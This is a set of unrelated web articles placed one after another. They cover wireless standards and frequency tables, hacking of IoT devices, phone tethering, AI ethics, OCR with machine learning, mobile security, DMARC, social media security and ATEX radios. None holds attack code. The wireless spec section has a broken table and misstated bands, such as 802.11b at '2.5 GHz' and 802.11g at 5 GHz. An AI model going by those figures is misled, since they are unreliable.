By 1991 NCR and AT&T developed an 802.11 precursor, intended for use by cash register systems. The technology was called WaveLAN and provided 1 and 2 Mbps data rates.
802.11b was the first widely accepted wireless networking standard. It appeared around 1999. 802.11b uses the 2.5 GHz band and provides about 11 Mbps data rate. It is divided into channels that are 22 MHz wide and spaced every 5 MHz with significant overlap.
Only channels 1 through 11 are allowed in the U.S. and similarly regulated nations, including all of North America and parts of Central and South America. Channels 1, 6, and 11 are used in these regions, as they are the only way to used three non-overlapping channels. European nations commonly use channels 1, 5, 9, and 13, four channels with some overlap.
Since 802.11b and 802.11g use the shared 2.4 GHz ISM band, they may suffer interference from microwave ovens, cordless telephones, cordless headphones, and Bluetooth devices. DSSS and OFDMA (that is, Direct-Sequence Spread Spectrum and Orthogonal Frequency-Division Multiple Access) helps to limit the interference.
802.11a and 802.11g came out next, in 2003. They use the 5 GHz band, with at least 23 non-overlapping channels. Their modulation schemes provide data rates of 54 Mbps.
802.11n appeared in 2009. It provides data rates up to 248 Mbps, with users getting single stream links up to 150 Mbps.
802.11ac appeared in 2013, providing single spatial streams with link speeds up to 866 Mbps. The 802.11ac standard specifies up to 8 spatial streams, meaning that a single user could get a total data rate of 6.97 Gbps.
The other standards, c-f, h, and j, are amendments that extend the scope of existing standards, and in some cases make corrections.
802.11ax is scheduled for release in 2019. It is expected to provide around 10 Gbps data rates.
WiFi and WiMax Characteristics
|Standard||Frequency||Max data rate||Spectrum sharing||Modulation|
||54 Mbps||OFDMA||BPSK, QPSK, 16-QAM, 64-QAM|
||54 Mbps||OFDMA||BPSK, QPSK, CCK|
||88-866 Mbps||OFDMA||BPSK, QPSK, 16-QAM, 64-QAM, 256-QAM|
||6.76 Gbps||SC, OFDMA||BPSK, QPSK, 16-QAM, 64-QAM|
|27-569 Mbps||SC, OFDMA||BPSK, QPSK, 16-QAM, 64-QAM, 256-QAM|
||1-16 Mbps||SC, OFDMA||BPSK, QPSK, 16-QAM, 64-QAM|
|1201 Mbps||OFDMA||BPSK, QPSK, 16-QAM, 64-QAM, 256-QAM, 1024-QAM|
|Bluetooth||802.15.1||2.4-2.484 MHz||1-3 Mbps||FHSS||GFSK, DQPSK, 3DPSK|
2.5, 3.5 GHz
5.2, 5.8 GHz
|70 Mbps||OFDMA||BPSK, QPSK, 16-QAM, 64-QAM|
|802.16e||2.3, 2.5, 3.3, 5 GHz||70 Mbps||SOFDMA||BPSK, QPSK, 16-QAM, 64-QAM|
At 5 GHz, devices in the US may operate at 5.250-5.350 GHz and 5.470-5.725 GHz. In Europe, 5.150-5.725 GHz is used.
5G wireless networks will use
WRC-15, the World Radiocommunication Conference in
November 2015, proposed these mm-wave bands:
24.25-27.5, 31.8-33.4, 37-40.5, 40.5-42.5, 45.5-50.2, 50.4-52.6, 66-76, and 81-86 GHz.
Digital Mobile Telephone Specifications
|System||Band, MHz||Uplink, MHz||Downlink, MHz||Channel Number||Regions of Use|
|GSM 400||450||450.4 — 457.6||460.4 — 467.6||259 — 293||Tanzania|
|GSM 400||480||478.8 — 486.0||488.8 — 496.0||306 — 340||Tanzania|
|GSM 850||850||824.0 — 849.0||869.0 — 894.0||128 — 251||USA, Canada, many other countries in the Americas.|
|900||890.0 — 915.0||935.0 — 960.0||1 — 124||Europe, Middle East, Africa, most of Asia, Brazil, Falklands, St Pierre & Miquelon, some Caribbian countries|
|900||880.0 — 915.0||925.0 — 960.0||
975 — 1023
(0, 1 — 124)
|Europe, Middle East, Africa, most of Asia|
|900||876.0 — 915.0||921.0 — 960.0||
955 — 973
(0, 1 — 124,
975 — 1023)
|Europe, Middle East, Africa, most of Asia|
|1800||1710.0 — 1785.0||1805.0 — 1880.0||512 — 885||Europe, Middle East, Africa, most of Asia, Brazil, Uruguay, some Caribbian countries|
|1900||1850.0 — 1910.0||1930.0 — 1990.0||512 — 810||USA, Canada, many other countries in the Americas.|
Wireless Frequency and Encryption Specifications
|GPRS (2G)||GSM 850/1900 MHz||GEA2/GEA3/GEA4|
|EDGE (2G)||GSM 850/1900 MHz||A5/4, A5/3|
|UMTS (3G) HSDPA/USUPA||850/1700/1900 MHz||USIM|
|LTE (4G)||700-2600 MHz||SNOW stream cipher|
|OFDMA||Orthogonal Frequency-Division Multiple Access|
|SOFDMA||Scalable Orthogonal Frequency-Division Multiple Access|
|BPSK||Binary Phase-Shift Keying|
|QPSK||Quadrature Phase-Shift Keying|
|QAM||Quadrature Amplitude Modulation|
|CCK||Complementary Code Keying| | <urn:uuid:dae958c9-6408-4376-99be-4e35c4db29b6> | CC-MAIN-2022-40 | https://cromwell-intl.com/networking/wlan-specs.html | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030334620.49/warc/CC-MAIN-20220925225000-20220926015000-00366.warc.gz | en | 0.742454 | 2,254 | 3.65625 | 4 |
NEWSBYTE: Researchers at Ben Gurion University in Israel have found that a variety of off-the-shelf smart home devices, including security cameras, doorbells, and baby monitors, are extremely easy to hack.
“It is truly frightening how easily a criminal, voyeur or pedophile can take over these devices,” said Dr Yossi Oren, a senior lecturer in BGU’s Department of Software and Information Systems Engineering.
BGU researchers discovered several ways hackers can take advantage of poorly secured devices. They discovered that similar products under different brands share the same common default passwords.
“It only took 30 minutes to find passwords for most of the devices and some of them were found through a Google search of the brand,” said PhD student Omer Shwartz, a member of Dr. Oren’s lab.
Consumers and businesses rarely change device passwords when purchased so devices could be operating with malicious code for years, added researchers, who were also able to log on to Wi-Fi networks simply by retrieving the password stored in a device.
Dr. Oren urged manufacturers to stop using easy, hard-coded passwords, to disable remote access capabilities, and to make it harder to get information from shared ports, like an audio jack (which was found to be vulnerable in other studies by [email protected] researchers).
“It seems getting IoT products to market at an attractive price is often more important than securing them properly,” he said.
A plan for smart home safety
Dr Oren’s team have proposed a seven-point plan for the safe use of smart home products.
1. Buy IoT devices only from reputable manufacturers and vendors.
2. Avoid purchasing used IoT devices. They could already have malware installed.
3. Research each device online to determine if it has a default password. If so, change before installing.
4. Use strong passwords with a minimum of 16 letters. These are harder to crack.
5. Multiple devices shouldn’t share the same passwords.
6. Update software regularly – something only reputable manufacturers will provide.
7. Carefully consider the benefits and risks of connecting any device to the internet.
Internet of Business says
We have published a number of stories that share a similar theme recently. The lesson is twofold. First, as the popularity of IoT devices and smart home gadgets increases, so will the media noise surrounding them. And second, it seems as if manufacturers – many of them with zero track record in cybersecurity – are indeed rushing products to market with basic security flaws easily exposed. | <urn:uuid:eff6184d-0ddf-4b15-beac-48afdcc61a1a> | CC-MAIN-2022-40 | https://internetofbusiness.com/israeli-hackers-breach-baby-monitors-smart-homes-in-30-minutes/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030334620.49/warc/CC-MAIN-20220925225000-20220926015000-00366.warc.gz | en | 0.952918 | 540 | 2.671875 | 3 |
Cell phone hotspots and tethering
The process of cell phone tethering is to use your cell phone as the source of your Internet connection. Cell phones use the exact same wireless technology as data sticks.
Over the past few years tethering has become a norm and is generally more accepted and allowed by the wireless providers. Rogers, Bell, Telus, Wind and others generally do allow tethering on their networks, however on some cell phone plans it may not be allowed. Please check with your provider if tethering is allowed or you may be charged extra from your provider.
There are three ways to use your cell phone as your source for the Internet,
1 – Wi-Fi Hotspot – This is the most simple and most common method. An option to enable the hotspot function can usually be found in the settings, either in the mobile network options or in the Wi-Fi options.
2 – USB cable tethering – This method delivers the same functionality as the Wi-Fi hotspot, however it is a bit more complex as the method depends on having the drivers installed on the computer. There have been cases where software updates have broken the USB tethering option from iTunes, rendering this method unusable.
3 – Bluetooth connection – Pairing your phone and your computer with Bluetooth is simple. However, not all phones support passing the internet connection through Bluetooth. On another note, Bluetooth isn’t meant for high speed data access, as it a technology designed for devices which do not require very fast connections. In general, this method isn’t the most popular one.
Why tether at all?
Tethering gives people the ability to work on the go, wherever there is cell phone service. Also, tethering is a great replacement to data sticks, and it prevents another bill, as data sticks are a separate subscription.
We at Group 4 Networks recommend to use the Wi-Fi hotspot option, as it the easiest to setup and the most common.
Should you have a hard time configuring tethering on your phone or would like more information on the topic, feel free to contact Group 4 Networks – we will gladly help. | <urn:uuid:8f0fffac-df60-42e3-b2bf-3155f959afb1> | CC-MAIN-2022-40 | https://g4ns.com/cell-phone-hotspots-and-tethering/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335257.60/warc/CC-MAIN-20220928145118-20220928175118-00366.warc.gz | en | 0.922816 | 440 | 2.78125 | 3 |
The implementation of artificial intelligence (AI) across all areas of daily life, from mobile applications to job recruitment, has brought with it important ethical connotations. The impact of AI is so important that lawmakers, businesses and even governments are meticulously looking at it to establish boundaries and rules that can safeguard individuals rights.
Professor Lokke Moerel, Senior of Counsel at Morrison & Foerster and one of Europe’s leading AI lawyers, exposed the current ethical dilemmas affecting AI implementation and the need to open black boxes to identify biases at the recent CIO UK Artificial Intelligence Summit.
[CIO UK’s Artificial Intelligence Summit – Photos and highlights]
She opened her talk by introducing two ethical dilemmas to her audience. In the first one, data scientists from a pharmaceutical company were presented with a situation where a product was short in supply. The firm’s executives asked them to make a prediction on how to best distribute the product to limit shortage and reduce complaints.
The data team reorganised the distribution with a positive outcome and a minimal number of complaints. In theory, the black box algorithm was successful and all stakeholders were satisfied.
However, explained Professor Moerel, looking at the reorganisation of the product distribution, it was discovered that it actually demoted certain postal codes – those from unprivileged neighbourhoods and with communities less prone to complain as a result of social alienation. What to do?
“‘The AI did it’ is not an acceptable excuse. Algorithmic accountability implies an obligation to report and justify algorithmic decision-making and to mitigate any negative social impacts or potential harms,” Professor Moerel said, referencing an MIT article about algorithmic accountability from 2017.
“The second scenario that the academic described concerned an AI-powered recruiting tool which favoured male candidates over female ones, but not more so than in the past. The underlying cause of this bias was that the algorithm had been trained using historical data, which consisted predominantly of resumes of male candidates.”
“If your data is biased – ‘one-sided’ – the algorithm will be biased,” declared the lawyer and academic. “You can’t just use all your historical data because all your historical data is likely biased. It’s very hard to get clean data.”
Digital Revolution, the new Industrial Revolution
In Professor Moerel’s view, there are great similarities between the first Industrial Revolution and today’s digital one. Although the former brought with it technological progress, it also created child labour, pollution and poor working conditions.
New technologies required numerous trials before they could work as required and be fully regulated.
“The first car had a person walking in front of it with a red flag because it didn’t have brakes,” she said. “Think about what society did then: roads, airbags, rules to regulate vehicles safety. Artificial intelligence is that first car without brakes. How it looks today is not how it will look in half a year from now and after we start cracking the black box.”
Although it might be tempting to adopt a pessimistic approach to AI, the scholar stressed that the new technology is just making its first steps, but that issues will be ultimately addressed. As was the case in the Industrial Revolution, some of the problems might however take years to be dealt with adequately.
Above all, Professor Moerel stressed the need for accountability. Despite decisions being processed by machines, there must be human accountability for the AI-driven tools used by organisations.
“If you end up in court and your answer is ‘the algorithm did it’, it won’t be accepted,” she said. “It’s one of your tools and you have to deal with it, making sure it comes to the right solutions: you must justify your algorithm-making and mitigate the negative effects. That is your task.”
According to Professor Moerel, at the core of the AI ethics dilemma lies privacy. From a legal perspective, there is no ownership of data – data is an intangible asset. There are also no intellectual property rights in data.
“The bizarre thing is that all the other fundamental rights – discrimination, freedom of speech, and so on – are folded into the assessment whether you can process the data under data protection laws,” she said. “That’s why it’s all about privacy.”
AI feeds itself with great amounts of data, which it then analyses to make predictions. The professor cited an example where people who suffer from obesity have a particular set of characteristics, which result into predictions. These predictions lead to actions, such as insurance companies increasing the insurance premium.
This implies a major legal shift in the burden of proof. If someone has those characteristics, they will be predicted as future obesity cases. How can people then prove that they won’t be obese?
“The question is, do I get a chance to prove the algorithm was wrong?” Professor Moerel asked the audience. “There are a number of challenges, including unforeseen applications and discrimination.”
Professor Moerel disagrees with calls for new extensive legislation, as the GDPR already provides adequate rules for data processing in the context of AI.
“GDPR requires you to mitigate impact on individuals plus society as a whole. This requires also an ethical assessment. There are many examples where companies were legally compliant, they got the consent, and still made everyone upset.”
She added: “Law is what you may or may not do – what you are allowed to do – and ethics is what you should or should not do. It’s a different assessment. Other than what people think, ethics are quite stable over time.”
If organisations and governments are transparent about the data and AI tools they are using, then there’s hope for better use of AI. The tipping point is that black boxes shouldn’t result in unfair biases and instead benefit individuals or society as a whole. In addition, algorithms need to be auditable and people must be accountable for them.
“We will overcome all the downsides of AI like we did with the Industrial Revolution but you have to be open about the negatives or the concerns so you can address them,” Professor Moerel concluded. “If you don’t, you’ll get a big backlash.”
Cristina Lago is Online Editor of CIO Asean
[Register for upcoming CIO UK events here] | <urn:uuid:835b2c6b-ec42-47cf-82af-79c7f7f216b0> | CC-MAIN-2022-40 | https://www.cio.com/article/196037/europe-s-leading-artificial-intelligence-lawyer-discusses-the-ethical-implications-of-ai.html | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337338.11/warc/CC-MAIN-20221002150039-20221002180039-00366.warc.gz | en | 0.95256 | 1,374 | 2.546875 | 3 |
Machine Learning Technologies are replacing simple OCR automation and Manual Data Entry. This ground-breaking technology addresses and offers solutions to human errors, scalability challenges, human resource issues, and turnover issues with technology considerably superior to OCR’s simple rules framework.
- 1 Machine Learning paired OCR
- 2 Noteworthy Advantages of OCR paired with Machine Learning
- 2.1 The more ML gets used, the fewer mistakes happen and the more complicated decisions it can make.
- 2.2 Once trained on a function, Machine Learning does not rely on manual processes.
- 2.3 Machine Learning can handle both structured and unstructured data with ease.
- 3 Invest in-house or Outsource as SaaS?
- 4 The Difference Between SaaP and SaaS
- 5 Conclusion
Machine Learning paired OCR
Artificial Intelligence, or AI, is a great tool for addressing the barriers of classic OCR approaches and achieving faster and more precise results.
Using Machine Learning to preprocess documents before passing them to a template is one way of circumventing OCR difficulties.
Additionally, Machine Learning augmented OCR uses OCR to interpret characters while improving them by adding context and flexibility.
Moreover, Machine Learning enhances its ability to understand data context and how you should work with it regularly. You can also use it in preprocessing to determine significant portions for extraction and classify documents before they get extracted. This ability makes it easier to anticipate what to expect from the extraction process. AI models may also be developed over time to evaluate historical data and detect potentially fraudulent activities, errors, and exceptions.
How Does it Work?
OCR Data Capture recognizes text from an analog image source and converts it to a digital duplicate which can be managed, stored, and edited easily.
Despite the great usability of OCRs, the increasing scale of jobs incorporated in these models provide Machine Learning engineers with a substantial hurdle.
For one, it is a difficult undertaking since it sits on the edge of two Artificial Intelligence fields, namely Natural Language Processing (NLP) which specifically deals with text and speech-to-text transcription data. It is concentrated on teaching machines to understand human speech and Computer Vision (CV), which trains ML models to see and interpret the visual elements in a manner that is relevant to how people see and solve them.
Therefore, before the OCR models can achieve their aim, they must first complete a series of smaller-scale tasks, beginning with image recognition of the letters and ending with the comprehension of the final words.
When the texts that need to get identified are present in natural settings, the OCR difficulty gets more complicated. These natural settings include handwritten shopping lists, license plates on cars, random graffiti on the buildings, street signs, and many more.
Moreover, when the algorithm is requested to convert the text into a digital copy and comprehend the specific data included in the text, an extra layer of complexity is introduced. While various methods have gotten used to tackle OCR, from contour detection to picture classification, these methods are still more recommended to work best for template-based text patterns with similar text size and type, image quality, and text position. Such strategies, in other words, are ineffective for large-scale, heterogeneous texts.
Noteworthy Advantages of OCR paired with Machine Learning
Below is a list of the edges offered by an OCR paired with Machine Learning:
The more ML gets used, the fewer mistakes happen and the more complicated decisions it can make.
Businesses all across the world are concerned about data inaccuracy and duplication as this problem is unavoidable. As a result, most companies are looking to automate their data entry operations to decrease manual errors and obtain highly accurate data for future analysis. Machine learning algorithms and predictive modeling algorithms are critical in reducing data entry errors and resolving issues with erroneous data.
Once trained on a function, Machine Learning does not rely on manual processes.
On a large scale, Machine Learning algorithms have already powered the present technological and economic revolution. Automated data entry can be utilized in various applications and is quite advantageous, thanks to predictive analysis and algorithms. Human data entry may not be sustainable in the future, and organizations will need to use machine learning to automate data entry. With each passing day, the world becomes more and more automated, and you must remove common data entry errors.
Machine Learning can handle both structured and unstructured data with ease.
Machine learning algorithms have been helpful in data automation and the handling of large amounts of big data. The real benefit of employing algorithms is that they can handle massive amounts of data while evaluating an infinite number of variables in a short amount of time.
Machine learning can convert handwriting into data.
An additional layer of complexity gets introduced when the algorithm you ask it to transform the text into a digital copy and interpret the specific data included in the text.
Invest in-house or Outsource as SaaS?
With the information provided above, the question remains. Is it better to invest in this technology in-house or to outsource this function as a SaaS?
Building an In-house Data Labeling Team
Having a data labeling team on staff can help the project in a variety of ways. For many firms, in-house data labeling teams are primarily concerned with direct oversight of the entire data annotation process. As a result, putting a team together nearby is a good idea.
The second argument for forming one’s own data annotation team is security. When files get annotated, they could potentially breach security rules if given to a third party. When jobs involve extremely sensitive themes and images that you cannot communicate over the internet, on-site teams are the best option.
Lastly, it is customary to have an in-house team for long-term Artificial Intelligence projects. Data flow is continuous, and personnel must annotate it over long periods.
The disadvantages of forming one’s own data labeling team are evident. The enormous time and resources required to hire and train a professional team, offer a secure location to operate, design software with the appropriate tools, and compile instructions are all costs associated with developing a good team. Moreover, constant administration of new staff is time-consuming and necessitates the assistance of HR professionals. One will need to have a steady personnel turnover if the demand is seasonal or project-by-project.
The Difference Between SaaP and SaaS
The following section will discuss the difference between SaaP and SaaS.
OCR paired ML as Software as a Product
Software as a Product, or SaaP, solutions necessitate the purchase of a license to use a solution, which one must then host oneself. SaaP solutions are a one-time investment with no monthly fees, but they frequently require considerable maintenance and updates. Additional expenses may get incurred if the product gets upgraded in the future or if an add-on gets installed.
If one wants to install the software on another computer, one may incur additional expenses. Moreover, engineers familiar with the software are also needed to get hired. Lastly, because one owns the software and executes it on the workstation, SaaP software is usually more customizable than SaaS software.
The Benefits of SaaP
Software as a product is something one buys rather than something one rents. It is the responsibility of the business to ensure software maintenance once it has gotten implemented. Upgrades to SaaS are frequently expensive, and they will get extensively involved from the start.
Because SaaP isn’t cloud-based, it necessitates the use of internal servers. Lastly, because SaaP is a static product, one will need to maintain it after acquiring the software. To keep up with software changes and data security, one will need a committed crew. SaaP also ensures that there is no third-party oversight, security can get controlled, ensuring offline usability.
OCR paired ML as Software as a Service
This software is distributed via internet browsers and gets hosted by the software seller or a third party. Application, software, and any data created by the user, on the other hand, are stored in the Cloud on the provider’s servers and delivered back and forth over the internet with SaaS.
Organizations get charged a standard cost for this service. In turn, the provider grants the user access to the application while adhering to quality standards, availability, and agreed-upon security. To utilize the software, all that is required is to have an Internet connection.
The Benefits of SaaS
SaaS offers the following benefits:
- Cost: Subscription-based software licensing makes it easier for organizations to identify and allocate expenditures to different business units or departments. Additionally, a consistent spend is easier to explain than a significant one-time expense every few years. Additionally, publishers who use the software as a service model may offer several pricing tiers, allowing enterprises to pay less in exchange for access to fewer program capabilities. This cost has resulted in a reduced purchasing threshold, allowing smaller enterprises to access software that they might not have been able to afford otherwise.
- Maintenance: The automatic access to patches and updates is maybe the best feature of SaaS. Businesses can use one iteration of an application until it is required to be upgraded to the current version, either for security concerns or to access new features, with a perpetual software license. Moreover, a subscription-based model means that the licenses will be automatically updated as the publisher issues new versions. The staff will not be utilizing out-of-date software, and the company does not have to invest in a completely new program.
- Mobility: Employees today are searching for more flexibility in their jobs, and workplace mobility is a key part of that. As a result, companies are adopting rules that allow employees to work from home. This trend implies that the software the employees rely on must be accessible from anywhere, so SaaS is becoming more popular. You can use SaaS-based programs anywhere there is a network connection because they do not require the installation of a disc. This convenience makes the mobile workplace more accessible. The system on which the program gets installed must be on and online at all times for proper SaaP monitoring. On the other hand, because SaaS is web-based, it is much easier to track its performance and availability.
Companies outsource to vendors offering Machine Learning paired with OCR as a SAAS, providing more flexibility and reduced expenses. As stated above, OCR paired ML as a SaaS only requires an internet connection for it to operate. Moreover, pricing varies depending on the features that an employee needs to utilize, resulting in a reduced cost.
As the world changes swiftly, technology should evolve along with it. As information becomes crucial and more available, having room for error is not an option. Machine Learning is one great solution. This technology addresses human errors, scalability challenges, human resource issues, and turnover issues with technology, whether used as a product or a service.
Reach out to our team today! | <urn:uuid:922b5323-935f-4564-94ce-91878c335c1e> | CC-MAIN-2022-40 | https://itechdata.ai/machine-learning-paired-ocr-in-house-or-saas/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337446.8/warc/CC-MAIN-20221003231906-20221004021906-00366.warc.gz | en | 0.928549 | 2,336 | 3.15625 | 3 |
As technology advances, consumers dependency on their Smartphone
gets stronger. Smartphones have become more valuable to consumers because they
serve many purposes beyond a standard line of communication. In fact, the
dependency has become so severe there is now a phobia defined by the fear of
not having your phone, nomophobia.
Consumers not only store personal items on their phone likes pictures and
emails, but now use their phone to conduct business and banking transactions.
This has turned these gadgets into walking gold mines for two different
reasons. First, Smartphones have a monetary value that physical thieves find
desirable by pawning or selling. The more dangerous theft of the two is the
potential identity theft through your phone being in the wrong hands. Many apps
and mobile sites are designed to make logging in easy by storing personal
information which may make things more convenient, but certainly not safer . Not to mention, many consumers store passwords and personal
records in their phones for a quick point of reference.
In efforts to solve this problem, many app develop companies
have created programs that use GPS as a way to track and locate your phone if
it gets misplaces and/or stolen. While this technology
is very useful and can save users from the pain of replacing their phones, it
can also work against them in a very ironic way. The same technology that helps
users find their misplaced phones also makes it easier for mobile hackers to
access personal information. This is where the line between mobile
security and mobile privacy often gets confused. While GPS centric apps
help with mobile security, they also exploit privacy. As the mobile
security landscape shifts and adjusts to new standards, especially in the
regards to mobile
payments and banking, it will become easier for companies to keep up.
Perhaps that is the problem, right now mobile security is a step behind
hackers. Fraud prevention measures are taking steps after malicious activity
happens when it should be the other way around. By knowing the risks and
prevention measures earlier, companies can help put security in front of
[Contributed by EVS Marketing] | <urn:uuid:2a0d3b05-f738-4fe2-a97b-5801266342b0> | CC-MAIN-2022-40 | https://www.electronicverificationsystems.com/blog/Mobile-Security---The-Line-Between-Security-and-Privacy | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337853.66/warc/CC-MAIN-20221006155805-20221006185805-00366.warc.gz | en | 0.953066 | 453 | 2.515625 | 3 |
Using Fingerprints to fight TB
Operation Asha, a Nonprofit NGO, is fighting the spread of tuberculosis in India using a biometric terminal you can build at home.
In conjunction with Microsoft Research, Operation ASHA has assembled a portable, cost-effective and efficient biometric system called eCompliance, using a portable computer or tablet, an SMS modem, fingerprint reader and open source software.
The purpose of these terminals is to administer treatment to those affected by Tuberculosis living in slums in India, and to ensure that medication is taken regularly. This practice, called Directly Observed Therapy (DOT), is among the most effective ways to fight tuberculosis in the third-world, and accounts for nearly half of the World Health Organization’s funding initiative for its global plan to stop tuberculosis.
A large issue when treating tuberculosis is that irregular treatment leads to mutated strains and drug resistance, which has become increasingly difficult to detect and to treat. According to a recent CTV.ca report, previous systems for administering DOT to those affected by tuberculosis have produced some misleading statistics in terms of treatment regularity and completion. Operation Asha’s biometric system of tracking dosages and treatment has changed this trend.
“Health data can be fudged,” Shelly Batra, president of Operation ASHA said in the CTV.ca report. “A fingerprint can’t be fudged.”
According to Batra, fingerprinting has lowered the dosage default rate to 1.5 per cent, and she now wants to replace the computers with smartphones.
By making the transition to mobile, the cost of the device drops by over 40%.
The software used was developed in partnership with Microsoft Research and is available freely online on their website. | <urn:uuid:8eabd323-1c1a-402c-9979-a6a6ea8fe6ee> | CC-MAIN-2022-40 | https://www.biometricupdate.com/201211/using-fingerprints-to-fight-tb | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030333455.97/warc/CC-MAIN-20220924182740-20220924212740-00566.warc.gz | en | 0.936439 | 366 | 2.875 | 3 |
What if there existed a technology that could dramatically lower the chances of your domains being spoofed and used for phishing attacks on recipients. Would you take advantage of it? Probably not, because the technology does exist and almost nobody is using it. And the reasons why are confounding.
The technology is called DMARC, which stands for Domain-based Message Authentication, Reporting & Conformance. “It is designed to give email domain owners the ability to protect their domain from unauthorized use, commonly known as email spoofing. The purpose and primary outcome of implementing DMARC is to protect a domain from being used in business email compromise attacks, phishing emails, email scams and other cyber threat activities.”
Why does DMARC matter? “DMARC is the first and only widely deployed technology that can make the ‘header from’ address (what users see in their email clients) trustworthy. Not only does this help protect customers and the brand, it discourages cybercriminals who are less likely to go after a brand with a DMARC record.”
According to an article on TechRepublic, “nearly 80% of websites have no DMARC policy in place, increasing the odds that their domain will be spoofed and used for phishing attacks on customers, according to 250ok’s Global DMARC Adoption 2019 report.”
“DMARC is considered the industry standard for email authentication to prevent attacks in which hackers send malicious emails via counterfeit web addresses, the report said.”
How widespread is the problem? “Only 23% of companies in the Fortune 500 have some form of DMARC policy despite being the largest US companies by revenue.“
To make matters worse, most 2020 Presidential campaigns are not using it. “[M]ost of the political campaigns of current major party candidates for next year’s U.S. presidential elections are failing to implement proper Domain-based Message Authentication, Reporting and Conformance (DMARC) policies to protect their donors and voters from phishing attacks that could lead to fraud.”
There are really only two possible explanations for the low adoption rate of DMARC. Either organizations don’t understand DMARC or they don’t care.
“Given the information available on the risks associated with leaving your domain unprotected, it’s shocking the number of brands that still don’t understand the importance of DMARC,” said Matthew Vernhout, director of privacy at 250ok.
The other possibility is that they don’t care. The reason why is because DMARC isn’t really used to protect you, it’s used to protect others. And maybe that’s the reason. Implementing DMARC means being a good neighbour, and perhaps that isn’t sufficient motivation, but it should be. | <urn:uuid:2f4269a1-a5a8-4e42-89bc-8afafe49f377> | CC-MAIN-2022-40 | https://dmarcreport.com/blog/phishing-protection-why-are-so-few-using-dmarc/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030334644.42/warc/CC-MAIN-20220926020051-20220926050051-00566.warc.gz | en | 0.949912 | 588 | 2.765625 | 3 |
Social Media and Cybersecurity: What’s the Relationship Status?
It’s clear. Social media and cybersecurity have quite a relationship. We often expose essential parts of our lives on the web, down to the tiniest details. As a result, we should know how social media and cybersecurity mingle. Previously, we’ve discussed the impact social media has had on cybersecurity and the power of misinformation. But now that some time has passed, you may be wondering: what’s the update? What does the relationship look like now? Well, hold on to your seats. After massive shifts like data privacy updates and other emerging trends- this will be a whirlwind.
According to Statusbrew, “over the past 12 months, the number of active social media users increased by more than 400 million, an addition of 9.9% for the total number to reach 4.55 billion.” Shocking? Not exactly, but a great reminder that social media is one of the most popular forms of communication around the world today. Although most social media platforms have security settings, cybercriminals find ways to access sensitive information. This sensitive information can include your passwords, bank account details, email addresses, or anything that they can use to steal your identity. For that very reason, social media and cybersecurity need each other now, more than ever. Let’s explore:
Significant Changes Call for Cybersecurity
Social media platforms are constantly changing their policies and algorithms, and with new updates come new security risks. Social media platforms must rely on cybersecurity protocols and best practices to mitigate risk. Let’s look at Facebook’s plans to transform into Meta as a popular example:
In 2021, Facebook announced that it would change its name and rebrand itself to — Meta. Meta will be based around Virtual Reality (VR) and augmented reality. Although the social media platform’s structure will stay the same, the new rebrand raises possible concerns about privacy and security. This presents the possibility of data such as usernames, email addresses, and other sensitive information being mishandled or breached by bad actors attempting to break into this new space. Subsequently, the power of cybersecurity comes into play at this moment.
What Role Do You Play?
Like all relationships, social media and cybersecurity face challenges. However, throughout it all, they rely on one another to keep individuals safe. As the popularity of social networking sites among businesses worldwide increases, cybercrime will take a bigger bite out of companies unprepared for battle. Whether you are an organization using social media to help generate brand awareness or an individual using social media to keep up with friends, you must be aware of your responsibilities concerning security. A few of those responsibilities include:
- Use two-step authentication to enter and protect all accounts.
- Keep your passwords updated regularly; refrain from repeating the same password across multiple accounts.
- Manage your privacy settings.
- Use precaution on all platforms; if something looks suspicious, report it.
Keeping the relationship between social media and cybersecurity healthy is not an easy job that can be done quickly. It will require help from us all by using these social platforms directly as they are intended.
Two Peas, One Pod
As long as the Internet of Things is around, bad actors will continue to pose a massive threat to businesses and personal lives. Social media’s intent is to provide access to one another by sharing our personal information and experiences, making it the primary target for hackers.
To sum up the ongoing status of this relationship, social networking sites will always need cybersecurity to protect shared experiences and information. Cybersecurity will always need social media as a channel to communicate the importance of navigating the cyberworld safely.
If you’re interested in learning more about this evolving relationship, check out a recent blog post: Cybersecurity’s Latest Battle: The Rise of Misinformation on Social Media. | <urn:uuid:f6553149-c151-42e9-b38a-4cab792ce353> | CC-MAIN-2022-40 | https://adlumin.com/post/social-media-cybersecurity/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335004.95/warc/CC-MAIN-20220927100008-20220927130008-00566.warc.gz | en | 0.926634 | 860 | 2.59375 | 3 |
COMMUNICATIONS IN HAZARDOUS ENVIRONMENTS. ATEX radios are essential tools for those working in the oil and gas industry where the working environment may contain potentially explosive gas or dust.
The starting point for all ATEX equipment is the focus on preventing the creation of an ignition source within a potentially explosive environment. Beyond this key point, when designing any two-way communications equipment there are five key considerations: audio performance, coverage, ruggedness, accessories and usability.
The predominant user groups for ATEX radios - from workers in the oil and gas industry, and fire fighters, to airport ground crews and miners - all share challenging operating conditions. They all experience very loud environments, often in excess of 90dB. This drives the most obvious requirement that the two-way radio communications equipment must be able to deliver clear, loud audio which can overcome the background noise.
And here we encounter perhaps one of the toughest technical challenges of communications in an ATEX product. In a non-ATEX product the simple solution is to drive more power into a bigger speaker. Unfortunately to meet the ATEX standards we need to restrict the amount of current which can be used to drive the speakers in the radios and accessories. This in turn directly impacts the loudness and clarity which can be generated. The challenge is to drive the speakers to the loudest, clearest possible level to overcome the 85-90dB ambient noise levels without resulting in the radio becoming an ignition source.
We also find that in certain environments the ambient noise is of a ‘different’ type. The sound of a pump bay on the fire truck is very different to the sound of an airplane engine or a petroleum refinery. The actual noise levels, the loudness, can be very similar, yet the frequencies which are generated can result in very different audio interferences. This requires the radios and accessories to be optimised for each particular type of ambient background noise.
NETWORK AND RADIO COVERAGE
Often the networks in which an ATEX radio is used will be privately owned, by the plant or facility, in which the radios are being used. In the case of civil fire fighters, they will often operate on a regional or nationwide public safety network. In both of these situations, the communications managers will still want to optimise their network to minimise capital investment whilst maximising coverage. This means the transmission power and receiver sensitivity of the radio need to be maximised to give the best possible coverage.
